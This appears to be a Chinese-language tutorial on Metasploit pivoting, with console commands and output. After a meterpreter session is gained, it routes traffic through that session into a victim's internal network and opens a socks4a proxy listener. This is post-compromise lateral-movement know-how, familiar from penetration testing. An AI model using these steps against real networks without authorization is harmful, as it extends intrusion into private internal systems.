利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd )
pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境,下面介绍下pivot的搭建和使用方法
使用方法route add 目标i或ip段 Netmask 要使用代理的会话,通过实例来说明:
在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问:
msf exploit(handler) > route add xxx.xxx.xxx.xxx 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
xxx.xxx.xxx.xxx 255.255.255.255 Session 1
这里如果要代理10.1.1.129/24 到session 1,则可以这么写
route add xxx.xxx.xxx.xxx/24 1
如果删除就是 delxxx.xxx.xxx.xxx/24 1
到这里pivot已经配置好了,你在msf里对xxx.xxx.xxx.xxx 进行扫描(db_nmap)或者访问(psexe 模块,ssh模块等)将通过代理session 1这个会话来访问。
如果想通过其他应用程序来使用这个代理怎么办呢,这时候可以借助 metasploit socks4a提供一个监听隧道供其他应用程序访问:
首先使用 socks4a并且配置,监听端口
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the socks4a proxy server